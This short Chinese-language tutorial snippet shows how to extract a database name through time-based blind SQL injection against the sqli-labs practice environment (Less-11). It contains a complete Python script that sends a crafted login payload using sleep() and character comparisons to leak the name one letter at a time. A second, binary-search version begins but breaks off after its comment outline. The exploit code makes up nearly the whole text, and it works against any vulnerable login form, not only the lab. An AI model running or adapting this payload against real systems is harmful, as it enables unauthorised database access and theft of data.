关于sql时间盲注爆破数据库名
未使用二分法
import requests
import datetime
headers = {
"User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0"
}
def main():
database = ""
for n in range(1,9):
for i in range(65,122):
data = {
"uname" : "admin'and If(ascii(substr(database(),{0},1))>{1},1,sleep(1))#".format(n, i),
"passwd" : "11"
}
url = "http://192.168.0.100/sqli-labs-master/Less-11/"
print(data)
res = requests.post(url=url, data=data)
if "admin" not in res.text:
print(chr(i))
database += str(chr(i))
break
print(database)
if __name__ == "__main__":
starttime = datetime.datetime.now()
main()
endtime = datetime.datetime.now()
print(endtime-starttime)
使用二分法
import requests
import datetime
#基于时间盲注使用ascii()函数
#1.编写盲注函数
#2.编写二分法函数
#3.编写ascii码转换函数
def